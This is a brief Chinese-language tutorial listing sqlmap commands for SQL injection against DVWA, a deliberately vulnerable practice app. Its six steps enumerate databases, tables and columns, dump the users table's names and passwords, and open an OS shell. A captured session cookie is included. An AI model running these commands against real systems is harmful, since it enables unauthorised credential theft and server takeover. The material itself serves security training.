sqlmap使用
注入點 http://1xx.xxx.xxx.xxxx/dvwa/vulnerabilities/sqli/index.php?id=1&Submit=Submit#
通過burp抓包 cookie:security=low; PHPSESSID=dmvbd4ijv2cm949sgtd69mqpd3
經典六步法:
1: -u “xxx” --cookie="yyy" //帶上cookie對url進行注入探測
2: -u “xxx” --cookie=“yyy” --current-db //對數據庫名進行獲取
3: -u “xxx” --cookie=“yyy” -D dvwa --tables //對數據庫dvwa的表名進行枚舉
4: -u “xxx” --cookie=“yyy” -D dvwa -T users --columns //對dvwa庫里的名為users表的列名進行枚舉
5: -u “xxx” --cookie=“yyy” -D dvwa -T users -C name,password --dump //探測user表name和password字段
6: -u “xxx” --cookie=“yyy” --os-shell //獲取shell,選擇后台語言
其他:
--help 顯示幫助信息
-v x //x=0~6,不同級別顯示不同程序的過程信息,數值越大,越詳細
--dbs 列出所有數據庫
--users 顯示當前登錄的用戶’root‘@‘localhost’
--purge-output 清除之前的緩存日志
--password 對跑出來的密碼進行枚舉